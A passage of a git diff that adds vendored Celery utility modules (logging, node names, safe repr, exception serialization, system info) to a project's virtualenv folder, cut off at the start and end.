without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sub-license, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be included +in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS +OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. +""" +import re +from datetime import datetime, timedelta, timezone + +from celery.utils.deprecated import warn + +__all__ = ('parse_iso8601',) + +# Adapted from http://delete.me.uk/2005/03/iso8601.html +ISO8601_REGEX = re.compile( + r'(?P[0-9]{4})(-(?P[0-9]{1,2})(-(?P[0-9]{1,2})' + r'((?P.)(?P[0-9]{2}):(?P[0-9]{2})' + r'(:(?P[0-9]{2})(\.(?P[0-9]+))?)?' + r'(?PZ|(([-+])([0-9]{2}):([0-9]{2})))?)?)?)?' +) +TIMEZONE_REGEX = re.compile( + r'(?P[+-])(?P[0-9]{2}).(?P[0-9]{2})' +) + + +def parse_iso8601(datestring): + """Parse and convert ISO-8601 string to datetime.""" + warn("parse_iso8601", "v5.3", "v6", "datetime.datetime.fromisoformat") + m = ISO8601_REGEX.match(datestring) + if not m: + raise ValueError('unable to parse date string %r' % datestring) + groups = m.groupdict() + tz = groups['timezone'] + if tz == 'Z': + tz = timezone(timedelta(0)) + elif tz: + m = TIMEZONE_REGEX.match(tz) + prefix, hours, minutes = m.groups() + hours, minutes = int(hours), int(minutes) + if prefix == '-': + hours = -hours + minutes = -minutes + tz = timezone(timedelta(minutes=minutes, hours=hours)) + return datetime( + int(groups['year']), int(groups['month']), + int(groups['day']), int(groups['hour'] or 0), + int(groups['minute'] or 0), int(groups['second'] or 0), + int(groups['fraction'] or 0), tz + ) diff --git a/env/Lib/site-packages/celery/utils/log.py b/env/Lib/site-packages/celery/utils/log.py new file mode 100644 index 00000000..4e8fc11f --- /dev/null +++ b/env/Lib/site-packages/celery/utils/log.py @@ -0,0 +1,295 @@ +"""Logging utilities.""" +import logging +import numbers +import os +import sys +import threading +import traceback +from contextlib import contextmanager +from typing import AnyStr, Sequence # noqa + +from kombu.log import LOG_LEVELS +from kombu.log import get_logger as _get_logger +from kombu.utils.encoding import safe_str + +from .term import colored + +__all__ = ( + 'ColorFormatter', 'LoggingProxy', 'base_logger', + 'set_in_sighandler', 'in_sighandler', 'get_logger', + 'get_task_logger', 'mlevel', + 'get_multiprocessing_logger', 'reset_multiprocessing_logger', 'LOG_LEVELS' +) + +_process_aware = False +_in_sighandler = False + +MP_LOG = os.environ.get('MP_LOG', False) + +RESERVED_LOGGER_NAMES = {'celery', 'celery.task'} + +# Sets up our logging hierarchy. +# +# Every logger in the celery package inherits from the "celery" +# logger, and every task logger inherits from the "celery.task" +# logger. +base_logger = logger = _get_logger('celery') + + +def set_in_sighandler(value): + """Set flag signifiying that we're inside a signal handler.""" + global _in_sighandler + _in_sighandler = value + + +def iter_open_logger_fds(): + seen = set() + loggers = (list(logging.Logger.manager.loggerDict.values()) + + [logging.getLogger(None)]) + for l in loggers: + try: + for handler in l.handlers: + try: + if handler not in seen: # pragma: no cover + yield handler.stream + seen.add(handler) + except AttributeError: + pass + except AttributeError: # PlaceHolder does not have handlers + pass + + +@contextmanager +def in_sighandler(): + """Context that records that we are in a signal handler.""" + set_in_sighandler(True) + try: + yield + finally: + set_in_sighandler(False) + + +def logger_isa(l, p, max=1000): + this, seen = l, set() + for _ in range(max): + if this == p: + return True + else: + if this in seen: + raise RuntimeError( + f'Logger {l.name!r} parents recursive', + ) + seen.add(this) + this = this.parent + if not this: + break + else: # pragma: no cover + raise RuntimeError(f'Logger hierarchy exceeds {max}') + return False + + +def _using_logger_parent(parent_logger, logger_): + if not logger_isa(logger_, parent_logger): + logger_.parent = parent_logger + return logger_ + + +def get_logger(name): + """Get logger by name.""" + l = _get_logger(name) + if logging.root not in (l, l.parent) and l is not base_logger: + l = _using_logger_parent(base_logger, l) + return l + + +task_logger = get_logger('celery.task') +worker_logger = get_logger('celery.worker') + + +def get_task_logger(name): + """Get logger for task module by name.""" + if name in RESERVED_LOGGER_NAMES: + raise RuntimeError(f'Logger name {name!r} is reserved!') + return _using_logger_parent(task_logger, get_logger(name)) + + +def mlevel(level): + """Convert level name/int to log level.""" + if level and not isinstance(level, numbers.Integral): + return LOG_LEVELS[level.upper()] + return level + + +class ColorFormatter(logging.Formatter): + """Logging formatter that adds colors based on severity.""" + + #: Loglevel -> Color mapping. + COLORS = colored().names + colors = { + 'DEBUG': COLORS['blue'], + 'WARNING': COLORS['yellow'], + 'ERROR': COLORS['red'], + 'CRITICAL': COLORS['magenta'], + } + + def __init__(self, fmt=None, use_color=True): + super().__init__(fmt) + self.use_color = use_color + + def formatException(self, ei): + if ei and not isinstance(ei, tuple): + ei = sys.exc_info() + r = super().formatException(ei) + return r + + def format(self, record): + msg = super().format(record) + color = self.colors.get(record.levelname) + + # reset exception info later for other handlers... + einfo = sys.exc_info() if record.exc_info == 1 else record.exc_info + + if color and self.use_color: + try: + # safe_str will repr the color object + # and color will break on non-string objects + # so need to reorder calls based on type. + # Issue #427 + try: + if isinstance(msg, str): + return str(color(safe_str(msg))) + return safe_str(color(msg)) + except UnicodeDecodeError: # pragma: no cover + return safe_str(msg) # skip colors + except Exception as exc: # pylint: disable=broad-except + prev_msg, record.exc_info, record.msg = ( + record.msg, 1, ''.format( + type(msg), exc + ), + ) + try: + return super().format(record) + finally: + record.msg, record.exc_info = prev_msg, einfo + else: + return safe_str(msg) + + +class LoggingProxy: + """Forward file object to :class:`logging.Logger` instance. + + Arguments: + logger (~logging.Logger): Logger instance to forward to. + loglevel (int, str): Log level to use when logging messages. + """ + + mode = 'w' + name = None + closed = False + loglevel = logging.ERROR + _thread = threading.local() + + def __init__(self, logger, loglevel=None): + # pylint: disable=redefined-outer-name + # Note that the logger global is redefined here, be careful changing. + self.logger = logger + self.loglevel = mlevel(loglevel or self.logger.level or self.loglevel) + self._safewrap_handlers() + + def _safewrap_handlers(self): + # Make the logger handlers dump internal errors to + # :data:`sys.__stderr__` instead of :data:`sys.stderr` to circumvent + # infinite loops. + + def wrap_handler(handler): # pragma: no cover + + class WithSafeHandleError(logging.Handler): + + def handleError(self, record): + try: + traceback.print_exc(None, sys.__stderr__) + except OSError: + pass # see python issue 5971 + + handler.handleError = WithSafeHandleError().handleError + return [wrap_handler(h) for h in self.logger.handlers] + + def write(self, data): + # type: (AnyStr) -> int + """Write message to logging object.""" + if _in_sighandler: + safe_data = safe_str(data) + print(safe_data, file=sys.__stderr__) + return len(safe_data) + if getattr(self._thread, 'recurse_protection', False): + # Logger is logging back to this file, so stop recursing. + return 0 + if data and not self.closed: + self._thread.recurse_protection = True + try: + safe_data = safe_str(data).rstrip('\n') + if safe_data: + self.logger.log(self.loglevel, safe_data) + return len(safe_data) + finally: + self._thread.recurse_protection = False + return 0 + + def writelines(self, sequence): + # type: (Sequence[str]) -> None + """Write list of strings to file. + + The sequence can be any iterable object producing strings. + This is equivalent to calling :meth:`write` for each string. + """ + for part in sequence: + self.write(part) + + def flush(self): + # This object is not buffered so any :meth:`flush` + # requests are ignored. + pass + + def close(self): + # when the object is closed, no write requests are + # forwarded to the logging object anymore. + self.closed = True + + def isatty(self): + """Here for file support.""" + return False + + +def get_multiprocessing_logger(): + """Return the multiprocessing logger.""" + try: + from billiard import util + except ImportError: + pass + else: + return util.get_logger() + + +def reset_multiprocessing_logger(): + """Reset multiprocessing logging setup.""" + try: + from billiard import util + except ImportError: + pass + else: + if hasattr(util, '_logger'): # pragma: no cover + util._logger = None + + +def current_process(): + try: + from billiard import process + except ImportError: + pass + else: + return process.current_process() + + +def current_process_index(base=1): + index = getattr(current_process(), 'index', None) + return index + base if index is not None else index diff --git a/env/Lib/site-packages/celery/utils/nodenames.py b/env/Lib/site-packages/celery/utils/nodenames.py new file mode 100644 index 00000000..b3d1a522 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/nodenames.py @@ -0,0 +1,102 @@ +"""Worker name utilities.""" +import os +import socket +from functools import partial + +from kombu.entity import Exchange, Queue + +from .functional import memoize +from .text import simple_format + +#: Exchange for worker direct queues. +WORKER_DIRECT_EXCHANGE = Exchange('C.dq2') + +#: Format for worker direct queue names. +WORKER_DIRECT_QUEUE_FORMAT = '{hostname}.dq2' + +#: Separator for worker node name and hostname. +NODENAME_SEP = '@' + +NODENAME_DEFAULT = 'celery' + +gethostname = memoize(1, Cache=dict)(socket.gethostname) + +__all__ = ( + 'worker_direct', 'gethostname', 'nodename', + 'anon_nodename', 'nodesplit', 'default_nodename', + 'node_format', 'host_format', +) + + +def worker_direct(hostname): + """Return the :class:`kombu.Queue` being a direct route to a worker. + + Arguments: + hostname (str, ~kombu.Queue): The fully qualified node name of + a worker (e.g., ``w1@example.com``). If passed a + :class:`kombu.Queue` instance it will simply return + that instead. + """ + if isinstance(hostname, Queue): + return hostname + return Queue( + WORKER_DIRECT_QUEUE_FORMAT.format(hostname=hostname), + WORKER_DIRECT_EXCHANGE, + hostname, + ) + + +def nodename(name, hostname): + """Create node name from name/hostname pair.""" + return NODENAME_SEP.join((name, hostname)) + + +def anon_nodename(hostname=None, prefix='gen'): + """Return the nodename for this process (not a worker). + + This is used for e.g. the origin task message field. + """ + return nodename(''.join([prefix, str(os.getpid())]), + hostname or gethostname()) + + +def nodesplit(name): + """Split node name into tuple of name/hostname.""" + parts = name.split(NODENAME_SEP, 1) + if len(parts) == 1: + return None, parts[0] + return parts + + +def default_nodename(hostname): + """Return the default nodename for this process.""" + name, host = nodesplit(hostname or '') + return nodename(name or NODENAME_DEFAULT, host or gethostname()) + + +def node_format(s, name, **extra): + """Format worker node name (name@host.com).""" + shortname, host = nodesplit(name) + return host_format( + s, host, shortname or NODENAME_DEFAULT, p=name, **extra) + + +def _fmt_process_index(prefix='', default='0'): + from .log import current_process_index + index = current_process_index() + return f'{prefix}{index}' if index else default + + +_fmt_process_index_with_prefix = partial(_fmt_process_index, '-', '') + + +def host_format(s, host=None, name=None, **extra): + """Format host %x abbreviations.""" + host = host or gethostname() + hname, _, domain = host.partition('.') + name = name or hname + keys = dict({ + 'h': host, 'n': name, 'd': domain, + 'i': _fmt_process_index, 'I': _fmt_process_index_with_prefix, + }, **extra) + return simple_format(s, keys) diff --git a/env/Lib/site-packages/celery/utils/objects.py b/env/Lib/site-packages/celery/utils/objects.py new file mode 100644 index 00000000..56e96ffd --- /dev/null +++ b/env/Lib/site-packages/celery/utils/objects.py @@ -0,0 +1,142 @@ +"""Object related utilities, including introspection, etc.""" +from functools import reduce + +__all__ = ('Bunch', 'FallbackContext', 'getitem_property', 'mro_lookup') + + +class Bunch: + """Object that enables you to modify attributes.""" + + def __init__(self, **kwargs): + self.__dict__.update(kwargs) + + +def mro_lookup(cls, attr, stop=None, monkey_patched=None): + """Return the first node by MRO order that defines an attribute. + + Arguments: + cls (Any): Child class to traverse. + attr (str): Name of attribute to find. + stop (Set[Any]): A set of types that if reached will stop + the search. + monkey_patched (Sequence): Use one of the stop classes + if the attributes module origin isn't in this list. + Used to detect monkey patched attributes. + + Returns: + Any: The attribute value, or :const:`None` if not found. + """ + stop = set() if not stop else stop + monkey_patched = [] if not monkey_patched else monkey_patched + for node in cls.mro(): + if node in stop: + try: + value = node.__dict__[attr] + module_origin = value.__module__ + except (AttributeError, KeyError): + pass + else: + if module_origin not in monkey_patched: + return node + return + if attr in node.__dict__: + return node + + +class FallbackContext: + """Context workaround. + + The built-in ``@contextmanager`` utility does not work well + when wrapping other contexts, as the traceback is wrong when + the wrapped context raises. + + This solves this problem and can be used instead of ``@contextmanager`` + in this example:: + + @contextmanager + def connection_or_default_connection(connection=None): + if connection: + # user already has a connection, shouldn't close + # after use + yield connection + else: + # must've new connection, and also close the connection + # after the block returns + with create_new_connection() as connection: + yield connection + + This wrapper can be used instead for the above like this:: + + def connection_or_default_connection(connection=None): + return FallbackContext(connection, create_new_connection) + """ + + def __init__(self, provided, fallback, *fb_args, **fb_kwargs): + self.provided = provided + self.fallback = fallback + self.fb_args = fb_args + self.fb_kwargs = fb_kwargs + self._context = None + + def __enter__(self): + if self.provided is not None: + return self.provided + context = self._context = self.fallback( + *self.fb_args, **self.fb_kwargs + ).__enter__() + return context + + def __exit__(self, *exc_info): + if self._context is not None: + return self._context.__exit__(*exc_info) + + +class getitem_property: + """Attribute -> dict key descriptor. + + The target object must support ``__getitem__``, + and optionally ``__setitem__``. + + Example: + >>> from collections import defaultdict + + >>> class Me(dict): + ... deep = defaultdict(dict) + ... + ... foo = _getitem_property('foo') + ... deep_thing = _getitem_property('deep.thing') + + + >>> me = Me() + >>> me.foo + None + + >>> me.foo = 10 + >>> me.foo + 10 + >>> me['foo'] + 10 + + >>> me.deep_thing = 42 + >>> me.deep_thing + 42 + >>> me.deep + defaultdict(, {'thing': 42}) + """ + + def __init__(self, keypath, doc=None): + path, _, self.key = keypath.rpartition('.') + self.path = path.split('.') if path else None + self.__doc__ = doc + + def _path(self, obj): + return (reduce(lambda d, k: d[k], [obj] + self.path) if self.path + else obj) + + def __get__(self, obj, type=None): + if obj is None: + return type + return self._path(obj).get(self.key) + + def __set__(self, obj, value): + self._path(obj)[self.key] = value diff --git a/env/Lib/site-packages/celery/utils/saferepr.py b/env/Lib/site-packages/celery/utils/saferepr.py new file mode 100644 index 00000000..feddd41f --- /dev/null +++ b/env/Lib/site-packages/celery/utils/saferepr.py @@ -0,0 +1,266 @@ +"""Streaming, truncating, non-recursive version of :func:`repr`. + +Differences from regular :func:`repr`: + +- Sets are represented the Python 3 way: ``{1, 2}`` vs ``set([1, 2])``. +- Unicode strings does not have the ``u'`` prefix, even on Python 2. +- Empty set formatted as ``set()`` (Python 3), not ``set([])`` (Python 2). +- Longs don't have the ``L`` suffix. + +Very slow with no limits, super quick with limits. +""" +import traceback +from collections import deque, namedtuple +from decimal import Decimal +from itertools import chain +from numbers import Number +from pprint import _recursion +from typing import Any, AnyStr, Callable, Dict, Iterator, List, Sequence, Set, Tuple # noqa + +from .text import truncate + +__all__ = ('saferepr', 'reprstream') + +#: Node representing literal text. +#: - .value: is the literal text value +#: - .truncate: specifies if this text can be truncated, for things like +#: LIT_DICT_END this will be False, as we always display +#: the ending brackets, e.g: [[[1, 2, 3, ...,], ..., ]] +#: - .direction: If +1 the current level is increment by one, +#: if -1 the current level is decremented by one, and +#: if 0 the current level is unchanged. +_literal = namedtuple('_literal', ('value', 'truncate', 'direction')) + +#: Node representing a dictionary key. +_key = namedtuple('_key', ('value',)) + +#: Node representing quoted text, e.g. a string value. +_quoted = namedtuple('_quoted', ('value',)) + + +#: Recursion protection. +_dirty = namedtuple('_dirty', ('objid',)) + +#: Types that are repsented as chars. +chars_t = (bytes, str) + +#: Types that are regarded as safe to call repr on. +safe_t = (Number,) + +#: Set types. +set_t = (frozenset, set) + +LIT_DICT_START = _literal('{', False, +1) +LIT_DICT_KVSEP = _literal(': ', True, 0) +LIT_DICT_END = _literal('}', False, -1) +LIT_LIST_START = _literal('[', False, +1) +LIT_LIST_END = _literal(']', False, -1) +LIT_LIST_SEP = _literal(', ', True, 0) +LIT_SET_START = _literal('{', False, +1) +LIT_SET_END = _literal('}', False, -1) +LIT_TUPLE_START = _literal('(', False, +1) +LIT_TUPLE_END = _literal(')', False, -1) +LIT_TUPLE_END_SV = _literal(',)', False, -1) + + +def saferepr(o, maxlen=None, maxlevels=3, seen=None): + # type: (Any, int, int, Set) -> str + """Safe version of :func:`repr`. + + Warning: + Make sure you set the maxlen argument, or it will be very slow + for recursive objects. With the maxlen set, it's often faster + than built-in repr. + """ + return ''.join(_saferepr( + o, maxlen=maxlen, maxlevels=maxlevels, seen=seen + )) + + +def _chaindict(mapping, + LIT_DICT_KVSEP=LIT_DICT_KVSEP, + LIT_LIST_SEP=LIT_LIST_SEP): + # type: (Dict, _literal, _literal) -> Iterator[Any] + size = len(mapping) + for i, (k, v) in enumerate(mapping.items()): + yield _key(k) + yield LIT_DICT_KVSEP + yield v + if i < (size - 1): + yield LIT_LIST_SEP + + +def _chainlist(it, LIT_LIST_SEP=LIT_LIST_SEP): + # type: (List) -> Iterator[Any] + size = len(it) + for i, v in enumerate(it): + yield v + if i < (size - 1): + yield LIT_LIST_SEP + + +def _repr_empty_set(s): + # type: (Set) -> str + return f'{type(s).__name__}()' + + +def _safetext(val): + # type: (AnyStr) -> str + if isinstance(val, bytes): + try: + val.encode('utf-8') + except UnicodeDecodeError: + # is bytes with unrepresentable characters, attempt + # to convert back to unicode + return val.decode('utf-8', errors='backslashreplace') + return val + + +def _format_binary_bytes(val, maxlen, ellipsis='...'): + # type: (bytes, int, str) -> str + if maxlen and len(val) > maxlen: + # we don't want to copy all the data, just take what we need. + chunk = memoryview(val)[:maxlen].tobytes() + return _bytes_prefix(f"'{_repr_binary_bytes(chunk)}{ellipsis}'") + return _bytes_prefix(f"'{_repr_binary_bytes(val)}'") + + +def _bytes_prefix(s): + return 'b' + s + + +def _repr_binary_bytes(val): + # type: (bytes) -> str + try: + return val.decode('utf-8') + except UnicodeDecodeError: + # possibly not unicode, but binary data so format as hex. + return val.hex() + + +def _format_chars(val, maxlen): + # type: (AnyStr, int) -> str + if isinstance(val, bytes): # pragma: no cover + return _format_binary_bytes(val, maxlen) + else: + return "'{}'".format(truncate(val, maxlen).replace("'", "\\'")) + + +def _repr(obj): + # type: (Any) -> str + try: + return repr(obj) + except Exception as exc: + stack = '\n'.join(traceback.format_stack()) + return f'' + + +def _saferepr(o, maxlen=None, maxlevels=3, seen=None): + # type: (Any, int, int, Set) -> str + stack = deque([iter([o])]) + for token, it in reprstream(stack, seen=seen, maxlevels=maxlevels): + if maxlen is not None and maxlen <= 0: + yield ', ...' + # move rest back to stack, so that we can include + # dangling parens. + stack.append(it) + break + if isinstance(token, _literal): + val = token.value + elif isinstance(token, _key): + val = saferepr(token.value, maxlen, maxlevels) + elif isinstance(token, _quoted): + val = _format_chars(token.value, maxlen) + else: + val = _safetext(truncate(token, maxlen)) + yield val + if maxlen is not None: + maxlen -= len(val) + for rest1 in stack: + # maxlen exceeded, process any dangling parens. + for rest2 in rest1: + if isinstance(rest2, _literal) and not rest2.truncate: + yield rest2.value + + +def _reprseq(val, lit_start, lit_end, builtin_type, chainer): + # type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...] + if type(val) is builtin_type: + return lit_start, lit_end, chainer(val) + return ( + _literal(f'{type(val).__name__}({lit_start.value}', False, +1), + _literal(f'{lit_end.value})', False, -1), + chainer(val) + ) + + +def reprstream(stack, seen=None, maxlevels=3, level=0, isinstance=isinstance): + """Streaming repr, yielding tokens.""" + # type: (deque, Set, int, int, Callable) -> Iterator[Any] + seen = seen or set() + append = stack.append + popleft = stack.popleft + is_in_seen = seen.__contains__ + discard_from_seen = seen.discard + add_to_seen = seen.add + + while stack: + lit_start = lit_end = None + it = popleft() + for val in it: + orig = val + if isinstance(val, _dirty): + discard_from_seen(val.objid) + continue + elif isinstance(val, _literal): + level += val.direction + yield val, it + elif isinstance(val, _key): + yield val, it + elif isinstance(val, Decimal): + yield _repr(val), it + elif isinstance(val, safe_t): + yield str(val), it + elif isinstance(val, chars_t): + yield _quoted(val), it + elif isinstance(val, range): # pragma: no cover + yield _repr(val), it + else: + if isinstance(val, set_t): + if not val: + yield _repr_empty_set(val), it + continue + lit_start, lit_end, val = _reprseq( + val, LIT_SET_START, LIT_SET_END, set, _chainlist, + ) + elif isinstance(val, tuple): + lit_start, lit_end, val = ( + LIT_TUPLE_START, + LIT_TUPLE_END_SV if len(val) == 1 else LIT_TUPLE_END, + _chainlist(val)) + elif isinstance(val, dict): + lit_start, lit_end, val = ( + LIT_DICT_START, LIT_DICT_END, _chaindict(val)) + elif isinstance(val, list): + lit_start, lit_end, val = ( + LIT_LIST_START, LIT_LIST_END, _chainlist(val)) + else: + # other type of object + yield _repr(val), it + continue + + if maxlevels and level >= maxlevels: + yield f'{lit_start.value}...{lit_end.value}', it + continue + + objid = id(orig) + if is_in_seen(objid): + yield _recursion(orig), it + continue + add_to_seen(objid) + + # Recurse into the new list/tuple/dict/etc by tacking + # the rest of our iterable onto the new it: this way + # it works similar to a linked list. + append(chain([lit_start], val, [_dirty(objid), lit_end], it)) + break diff --git a/env/Lib/site-packages/celery/utils/serialization.py b/env/Lib/site-packages/celery/utils/serialization.py new file mode 100644 index 00000000..6c6b3b76 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/serialization.py @@ -0,0 +1,273 @@ +"""Utilities for safely pickling exceptions.""" +import datetime +import numbers +import sys +from base64 import b64decode as base64decode +from base64 import b64encode as base64encode +from functools import partial +from inspect import getmro +from itertools import takewhile + +from kombu.utils.encoding import bytes_to_str, safe_repr, str_to_bytes + +try: + import cPickle as pickle +except ImportError: + import pickle + +__all__ = ( + 'UnpickleableExceptionWrapper', 'subclass_exception', + 'find_pickleable_exception', 'create_exception_cls', + 'get_pickleable_exception', 'get_pickleable_etype', + 'get_pickled_exception', 'strtobool', +) + +#: List of base classes we probably don't want to reduce to. +unwanted_base_classes = (Exception, BaseException, object) + +STRTOBOOL_DEFAULT_TABLE = {'false': False, 'no': False, '0': False, + 'true': True, 'yes': True, '1': True, + 'on': True, 'off': False} + + +def subclass_exception(name, parent, module): + """Create new exception class.""" + return type(name, (parent,), {'__module__': module}) + + +def find_pickleable_exception(exc, loads=pickle.loads, + dumps=pickle.dumps): + """Find first pickleable exception base class. + + With an exception instance, iterate over its super classes (by MRO) + and find the first super exception that's pickleable. It does + not go below :exc:`Exception` (i.e., it skips :exc:`Exception`, + :class:`BaseException` and :class:`object`). If that happens + you should use :exc:`UnpickleableException` instead. + + Arguments: + exc (BaseException): An exception instance. + loads: decoder to use. + dumps: encoder to use + + Returns: + Exception: Nearest pickleable parent exception class + (except :exc:`Exception` and parents), or if the exception is + pickleable it will return :const:`None`. + """ + exc_args = getattr(exc, 'args', []) + for supercls in itermro(exc.__class__, unwanted_base_classes): + try: + superexc = supercls(*exc_args) + loads(dumps(superexc)) + except Exception: # pylint: disable=broad-except + pass + else: + return superexc + + +def itermro(cls, stop): + return takewhile(lambda sup: sup not in stop, getmro(cls)) + + +def create_exception_cls(name, module, parent=None): + """Dynamically create an exception class.""" + if not parent: + parent = Exception + return subclass_exception(name, parent, module) + + +def ensure_serializable(items, encoder): + """Ensure items will serialize. + + For a given list of arbitrary objects, return the object + or a string representation, safe for serialization. + + Arguments: + items (Iterable[Any]): Objects to serialize. + encoder (Callable): Callable function to serialize with. + """ + safe_exc_args = [] + for arg in items: + try: + encoder(arg) + safe_exc_args.append(arg) + except Exception: # pylint: disable=broad-except + safe_exc_args.append(safe_repr(arg)) + return tuple(safe_exc_args) + + +class UnpickleableExceptionWrapper(Exception): + """Wraps unpickleable exceptions. + + Arguments: + exc_module (str): See :attr:`exc_module`. + exc_cls_name (str): See :attr:`exc_cls_name`. + exc_args (Tuple[Any, ...]): See :attr:`exc_args`. + + Example: + >>> def pickle_it(raising_function): + ... try: + ... raising_function() + ... except Exception as e: + ... exc = UnpickleableExceptionWrapper( + ... e.__class__.__module__, + ... e.__class__.__name__, + ... e.args, + ... ) + ... pickle.dumps(exc) # Works fine. + """ + + #: The module of the original exception. + exc_module = None + + #: The name of the original exception class. + exc_cls_name = None + + #: The arguments for the original exception. + exc_args = None + + def __init__(self, exc_module, exc_cls_name, exc_args, text=None): + safe_exc_args = ensure_serializable( + exc_args, lambda v: pickle.loads(pickle.dumps(v)) + ) + self.exc_module = exc_module + self.exc_cls_name = exc_cls_name + self.exc_args = safe_exc_args + self.text = text + super().__init__(exc_module, exc_cls_name, safe_exc_args, + text) + + def restore(self): + return create_exception_cls(self.exc_cls_name, + self.exc_module)(*self.exc_args) + + def __str__(self): + return self.text + + @classmethod + def from_exception(cls, exc): + res = cls( + exc.__class__.__module__, + exc.__class__.__name__, + getattr(exc, 'args', []), + safe_repr(exc) + ) + if hasattr(exc, "__traceback__"): + res = res.with_traceback(exc.__traceback__) + return res + + +def get_pickleable_exception(exc): + """Make sure exception is pickleable.""" + try: + pickle.loads(pickle.dumps(exc)) + except Exception: # pylint: disable=broad-except + pass + else: + return exc + nearest = find_pickleable_exception(exc) + if nearest: + return nearest + return UnpickleableExceptionWrapper.from_exception(exc) + + +def get_pickleable_etype(cls, loads=pickle.loads, dumps=pickle.dumps): + """Get pickleable exception type.""" + try: + loads(dumps(cls)) + except Exception: # pylint: disable=broad-except + return Exception + else: + return cls + + +def get_pickled_exception(exc): + """Reverse of :meth:`get_pickleable_exception`.""" + if isinstance(exc, UnpickleableExceptionWrapper): + return exc.restore() + return exc + + +def b64encode(s): + return bytes_to_str(base64encode(str_to_bytes(s))) + + +def b64decode(s): + return base64decode(str_to_bytes(s)) + + +def strtobool(term, table=None): + """Convert common terms for true/false to bool. + + Examples (true/false/yes/no/on/off/1/0). + """ + if table is None: + table = STRTOBOOL_DEFAULT_TABLE + if isinstance(term, str): + try: + return table[term.lower()] + except KeyError: + raise TypeError(f'Cannot coerce {term!r} to type bool') + return term + + +def _datetime_to_json(dt): + # See "Date Time String Format" in the ECMA-262 specification. + if isinstance(dt, datetime.datetime): + r = dt.isoformat() + if dt.microsecond: + r = r[:23] + r[26:] + if r.endswith('+00:00'): + r = r[:-6] + 'Z' + return r + elif isinstance(dt, datetime.time): + r = dt.isoformat() + if dt.microsecond: + r = r[:12] + return r + else: + return dt.isoformat() + + +def jsonify(obj, + builtin_types=(numbers.Real, str), key=None, + keyfilter=None, + unknown_type_filter=None): + """Transform object making it suitable for json serialization.""" + from kombu.abstract import Object as KombuDictType + _jsonify = partial(jsonify, builtin_types=builtin_types, key=key, + keyfilter=keyfilter, + unknown_type_filter=unknown_type_filter) + + if isinstance(obj, KombuDictType): + obj = obj.as_dict(recurse=True) + + if obj is None or isinstance(obj, builtin_types): + return obj + elif isinstance(obj, (tuple, list)): + return [_jsonify(v) for v in obj] + elif isinstance(obj, dict): + return { + k: _jsonify(v, key=k) for k, v in obj.items() + if (keyfilter(k) if keyfilter else 1) + } + elif isinstance(obj, (datetime.date, datetime.time)): + return _datetime_to_json(obj) + elif isinstance(obj, datetime.timedelta): + return str(obj) + else: + if unknown_type_filter is None: + raise ValueError( + f'Unsupported type: {type(obj)!r} {obj!r} (parent: {key})' + ) + return unknown_type_filter(obj) + + +def raise_with_context(exc): + exc_info = sys.exc_info() + if not exc_info: + raise exc + elif exc_info[1] is exc: + raise + raise exc from exc_info[1] diff --git a/env/Lib/site-packages/celery/utils/static/__init__.py b/env/Lib/site-packages/celery/utils/static/__init__.py new file mode 100644 index 00000000..5051e5a0 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/static/__init__.py @@ -0,0 +1,14 @@ +"""Static files.""" +import os + + +def get_file(*args): + # type: (*str) -> str + """Get filename for static file.""" + return os.path.join(os.path.abspath(os.path.dirname(__file__)), *args) + + +def logo(): + # type: () -> bytes + """Celery logo image.""" + return get_file('celery_128.png') diff --git a/env/Lib/site-packages/celery/utils/static/celery_128.png b/env/Lib/site-packages/celery/utils/static/celery_128.png new file mode 100644 index 00000000..c3ff2d13 Binary files /dev/null and b/env/Lib/site-packages/celery/utils/static/celery_128.png differ diff --git a/env/Lib/site-packages/celery/utils/sysinfo.py b/env/Lib/site-packages/celery/utils/sysinfo.py new file mode 100644 index 00000000..57425dd8 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/sysinfo.py @@ -0,0 +1,48 @@ +"""System information utilities.""" +import os +from math import ceil + +from kombu.utils.objects import cached_property + +__all__ = ('load_average', 'df') + + +if hasattr(os, 'getloadavg'): + + def _load_average(): + return tuple(ceil(l * 1e2) / 1e2 for l in os.getloadavg()) + +else: # pragma: no cover + # Windows doesn't have getloadavg + def _load_average(): + return (0.0, 0.0, 0.0) + + +def load_average(): + """Return system load average as a triple.""" + return _load_average() + + +class df: + """Disk information.""" + + def __init__(self, path): + self.path = path + + @property + def total_blocks(self): + return self.stat.f_blocks * self.stat.f_frsize / 1024 + + @property + def available(self): + return self.stat.f_bavail * self.stat.f_frsize / 1024 + + @property + def capacity(self): + avail = self.stat.f_bavail + used = self.stat.f_blocks - self.stat.f_bfree + return int(ceil(used * 100.0 / (used + avail) + 0.5)) + + @cached_property + def stat(self): + return os.statvfs(os.path.abspath(self.path)) diff --git a/env/Lib/site-packages/celery/utils/term.py b/env/Lib/site-packages/celery/utils/term.py new file mode 100644 index 00000000..a2eff996 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/term.py @@ -0,0 +1,177 @@ +"""Terminals and colors.""" +import base64 +import codecs +import os +import platform +import sys +from functools import reduce + +__all__ = ('colored',) + +BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) +OP_SEQ = '\033[%dm' +RESET_SEQ = '\033[0m' +COLOR_SEQ = '\033[1;%dm' + +IS_WINDOWS = platform.system() == 'Windows' + +ITERM_PROFILE = os.environ.get('ITERM_PROFILE') +TERM = os.environ.get('TERM') +TERM_IS_SCREEN = TERM and TERM.startswith('screen') + +# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux; +# ST, and for all ESCs in to be replaced with ESC ESC. +# It only accepts ESC backslash for ST. +_IMG_PRE = '\033Ptmux;\033\033]' if 